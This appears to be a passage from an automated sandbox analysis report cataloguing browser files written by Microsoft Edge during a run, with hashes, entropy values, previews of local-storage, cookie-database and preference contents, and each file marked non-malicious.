                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1343
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5828634470557015
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:ytZWdmUlHFoln6PbwkT0DmXZcWpV03y1x4Cxq9IlswrnMyG:ytZ8mAunKbwPmXZLpV03Sx4LylsEMyG
                                                                                                                                                                                                                                                                                                  MD5:2D1C057B0CB1B2C42DAE859581067419
                                                                                                                                                                                                                                                                                                  SHA1:B4AF4C82981813A26438C43E1F2BE2E586B9DB5A
                                                                                                                                                                                                                                                                                                  SHA-256:C03A0A046BE3424471E7F838BA11971ACFEDFDF05D5C2202EA1943137E52CFA4
                                                                                                                                                                                                                                                                                                  SHA-512:8EB0F256AB743E101EE2B2C591DF4C7A57C5FE690729E15B9024BC54DCA88EDFF160887898BDEBE90538BDC0C2345F4E1E9DDF2436569CC38BA1137C8F603620
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.4.B8................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":785}.!_https://ntp.msn.com..LastKnownPV..1734931475262.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734931476161.._https://ntp.msn.com..MUID!.2DB99B69D85C6DF817C28E37D9F46CAD.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734931475328,"schedule":[-1,16,-1,32,-1,14,-1],"scheduleFixed":[-1,16,-1,32,-1,14,-1],"simpleSchedule":[18,16,22,44,36,10,9]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734931475235.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.138753906737369
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:5Uy9+q2P923oH+Tcwt8a2jMGIFUt8yVmNJZmw+yjk9VkwO923oH+Tcwt8a2jMmLJ:V4v4Yeb8EFUt8rJ/+GkD5LYeb8bJ
                                                                                                                                                                                                                                                                                                  MD5:8168D7751C4ECE8707488E705C92F15A
                                                                                                                                                                                                                                                                                                  SHA1:EF0F72B469A7405D2C9DA3E534681E6D9670D3DC
                                                                                                                                                                                                                                                                                                  SHA-256:21C9A582EAB8BF2B53E6794D3D4E870684F5D52CBB3B891A04ECE8AD86737E2C
                                                                                                                                                                                                                                                                                                  SHA-512:1847FE05248F2E59E172572773517B493F7E827F28B74494E6E7F7A325913DDB2AA55088F1606A370929A6214C7117214E228C72AEC485D2033744D727932A2A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.761 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:24:20.762 1db8 Recovering log #3.2024/12/23-00:24:20.764 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.138753906737369
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:5Uy9+q2P923oH+Tcwt8a2jMGIFUt8yVmNJZmw+yjk9VkwO923oH+Tcwt8a2jMmLJ:V4v4Yeb8EFUt8rJ/+GkD5LYeb8bJ
                                                                                                                                                                                                                                                                                                  MD5:8168D7751C4ECE8707488E705C92F15A
                                                                                                                                                                                                                                                                                                  SHA1:EF0F72B469A7405D2C9DA3E534681E6D9670D3DC
                                                                                                                                                                                                                                                                                                  SHA-256:21C9A582EAB8BF2B53E6794D3D4E870684F5D52CBB3B891A04ECE8AD86737E2C
                                                                                                                                                                                                                                                                                                  SHA-512:1847FE05248F2E59E172572773517B493F7E827F28B74494E6E7F7A325913DDB2AA55088F1606A370929A6214C7117214E228C72AEC485D2033744D727932A2A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.761 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:24:20.762 1db8 Recovering log #3.2024/12/23-00:24:20.764 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\85af805e-db91-4ef5-ac2e-654be3b6d921.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7750790014236455
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:tT56DE9DiMoSR5Zj2phiTHEudjgXcf0L/ZJVb:V56o9DiMo4552phumXI0LhJVb
                                                                                                                                                                                                                                                                                                  MD5:A0DEAE1FA8A135B96DE0C792553E6AE9
                                                                                                                                                                                                                                                                                                  SHA1:595859288FAAD6385E84984D2BD2C44FF2581879
                                                                                                                                                                                                                                                                                                  SHA-256:D0AC4C563E84443C081BF7964C74758E9F624C02F3B63EEDCFD74E556EA3EAC8
                                                                                                                                                                                                                                                                                                  SHA-512:F951D466A230392E4D459E8D56524E01297D365E2FAA946596AD0AD3449FF71EF84699FE6473FFB538838D439D1ADF78FBFE6D2931A085DA3591A9FC158FA07F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2147822752933626
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBRWg:eIEumQv8m1ccnvS60qYIv
                                                                                                                                                                                                                                                                                                  MD5:EC4EC6CF3D3765D2F44C7E3496B6E5DC
                                                                                                                                                                                                                                                                                                  SHA1:2703C67A91A3E0ED23AA4CD2C6A5215B6AD5F76A
                                                                                                                                                                                                                                                                                                  SHA-256:E7C40D8FC530ABA3A79A1B1DC663BFBAA8E4122D65B8CFCA980EECD66E902C1E
                                                                                                                                                                                                                                                                                                  SHA-512:2DFDD13D60D7A237350382E29E8D180F401879791A7D0C39F1EB93F9B85D7E524DEA100481FA340CF8CEA4151E0503F15562A202961F88DD71A24132AE50678E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF458bb.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4721f.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c357900c-0127-4db4-9ac8-bc3bb2c35be5.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d0c20b8e-2eda-4809-b032-87a09bf97b88.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\eeb95b4e-838f-43b2-8417-1acb3ac6b07c.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                  MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                  SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                  SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                  SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9713
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1123214215596
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:st3kdpos4hsZihUkrHCV8ibV+FauQA66WuaFIMYSPLYJ:st3Qos4hfhQbG7Qx6WuaTYf
                                                                                                                                                                                                                                                                                                  MD5:18D9B84D4BE5616664981543C13336ED
                                                                                                                                                                                                                                                                                                  SHA1:96B64104FEE8F812F2A3AC640BEC228AFB12F42E
                                                                                                                                                                                                                                                                                                  SHA-256:C239AD6488C9D29DA05DDFA40FBDE75C455D32D79FF18ED01694C7862F8C85EF
                                                                                                                                                                                                                                                                                                  SHA-512:48CA7B4286EFFFB9154BEA6AD3F022129FBF24C1F9384538DA3359613DF2BE8C088F068AEC0D52FBD9BFCF0E9E7E82073087AD05035FCBC35ABF79F672EAC151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4a331.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9713
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1123214215596
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:st3kdpos4hsZihUkrHCV8ibV+FauQA66WuaFIMYSPLYJ:st3Qos4hfhQbG7Qx6WuaTYf
                                                                                                                                                                                                                                                                                                  MD5:18D9B84D4BE5616664981543C13336ED
                                                                                                                                                                                                                                                                                                  SHA1:96B64104FEE8F812F2A3AC640BEC228AFB12F42E
                                                                                                                                                                                                                                                                                                  SHA-256:C239AD6488C9D29DA05DDFA40FBDE75C455D32D79FF18ED01694C7862F8C85EF
                                                                                                                                                                                                                                                                                                  SHA-512:48CA7B4286EFFFB9154BEA6AD3F022129FBF24C1F9384538DA3359613DF2BE8C088F068AEC0D52FBD9BFCF0E9E7E82073087AD05035FCBC35ABF79F672EAC151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4dffc.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9713
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1123214215596
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:st3kdpos4hsZihUkrHCV8ibV+FauQA66WuaFIMYSPLYJ:st3Qos4hfhQbG7Qx6WuaTYf
                                                                                                                                                                                                                                                                                                  MD5:18D9B84D4BE5616664981543C13336ED
                                                                                                                                                                                                                                                                                                  SHA1:96B64104FEE8F812F2A3AC640BEC228AFB12F42E
                                                                                                                                                                                                                                                                                                  SHA-256:C239AD6488C9D29DA05DDFA40FBDE75C455D32D79FF18ED01694C7862F8C85EF
                                                                                                                                                                                                                                                                                                  SHA-512:48CA7B4286EFFFB9154BEA6AD3F022129FBF24C1F9384538DA3359613DF2BE8C088F068AEC0D52FBD9BFCF0E9E7E82073087AD05035FCBC35ABF79F672EAC151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.566358911446204
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WZzljYWPrXfGd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuXWVsrwjypRtu5:WZzljYWPrXfGdu1jaPmVFwt2
                                                                                                                                                                                                                                                                                                  MD5:A956E0076959A92FE6BA2186DAF41D72
                                                                                                                                                                                                                                                                                                  SHA1:0F5FB90FE215BB72A3CA26CB186107176860E1FF
                                                                                                                                                                                                                                                                                                  SHA-256:DC99216303DAC945AC9E7E28C621A62088CAC185C081A78DA213963A7174E669
                                                                                                                                                                                                                                                                                                  SHA-512:3CF6A92D93DD8F2DEB6E00521522FED1CBC95039660A2697A464D747D4F6D6C086E1DCA221E75E8B10979A9CCF6522057A96C3557C673EC95D69806C318D4743
